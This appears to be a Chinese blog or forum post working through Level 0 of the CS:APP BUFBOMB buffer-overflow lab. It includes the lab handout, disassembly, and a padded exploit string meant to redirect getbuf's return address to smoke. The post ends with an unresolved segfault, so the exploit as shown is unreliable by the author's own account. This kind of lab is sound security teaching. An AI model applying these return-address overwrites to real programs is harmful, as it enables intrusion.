Level 0: Candle (10 pts)
The function getbuf is called within BUFBOMB by a function test having the following C code:
1 void test()
2 {
3 int val;
4 volatile int local = 0xdeadbeef;
5 entry_check(3); /* Make sure entered this function properly /
6 val = getbuf();
7 / Check for corrupted stack /
8 if (local != 0xdeadbeef) {
9 printf("Sabotaged!: the stack has been corrupted\n");
10 }
11 else if (val == cookie) {
12 printf("Boom!: getbuf returned 0x%x\n", val);
13 validate(3);
14 }
15 else {
16 printf("Dud: getbuf returned 0x%x\n", val);
17 }
18 }
When getbuf executes its return statement (line 5 of getbuf), the program ordinarily resumes execution within function test (at line 8 of this function). Within the file bufbomb, there is a function smoke having the following C code:
void smoke()
{
entry_check(0); / Make sure entered this function properly */
printf("Smoke!: You called smoke()\n");
validate(0);
exit(0);
}
Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test. You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf with the address of the first instruction in smoke. Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke causes the program to exit directly.
Some Advice:
All the information you need to devise your exploit string for this level can be determined by examining a diassembled version of BUFBOMB.
Be careful about byte ordering.
You might want to use GDB to step the program through the last few instructions of getbuf to make sure it is doing the right thing.
The placement of buf within the stack frame for getbuf depends on which version of GCC was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of these bytes can be arbitrary.
可以看到:Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test.
任务是把getbuf函数返回的地址改为smoke的地址。
getbuf函数的反汇编代码:
[cpp] view plain copy
0x08048ad0 <+0>: push %ebp
0x08048ad1 <+1>: mov %esp,%ebp
0x08048ad3 <+3>: sub $0x28,%esp
0x08048ad6 <+6>: lea -0x18(%ebp),%eax
0x08048ad9 <+9>: mov %eax,(%esp)
0x08048adc <+12>: call 0x80489c0
0x08048ae1 <+17>: leave
0x08048ae2 <+18>: mov $0x1,%eax
0x08048ae7 <+23>: ret
可以看到buff存放在返回地址的4+0x18=0x1c处,其十进制是28则要在输入填充28个数,后接smoke的地址
smoke反汇编:
Dump of assembler code for function smoke:
0x08048eb0 <+0>: push %ebp
0x08048eb1 <+1>: mov %esp,%ebp
0x08048eb3 <+3>: sub $0x8,%esp
0x08048eb6 <+6>: movl $0x80495f7,(%esp)
0x08048ebd <+13>: call 0x8048758 puts@plt
0x08048ec2 <+18>: movl $0x0,(%esp)
0x08048ec9 <+25>: call 0x8048af0
0x08048ece <+30>: movl $0x0,(%esp)
0x08048ed5 <+37>: call 0x80487e8 exit@plt
smoke地址08048eb0,因为是小端机器
所以填入
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8e 04 08
然而怎么都不对,输出
run -t wu<text.txt
Starting program: /home/zawdcxs/Desktop/bufbomb -t wu<text.txt
Team: wu
Cookie: 0x706f2ba4
Program received signal SIGSEGV, Segmentation fault.
0x30302030 in ?? ()
我试验,输入12个字符,就是刚超出buf长度也提示上面这个。按理论上面先pad28个字符是没毛病啊
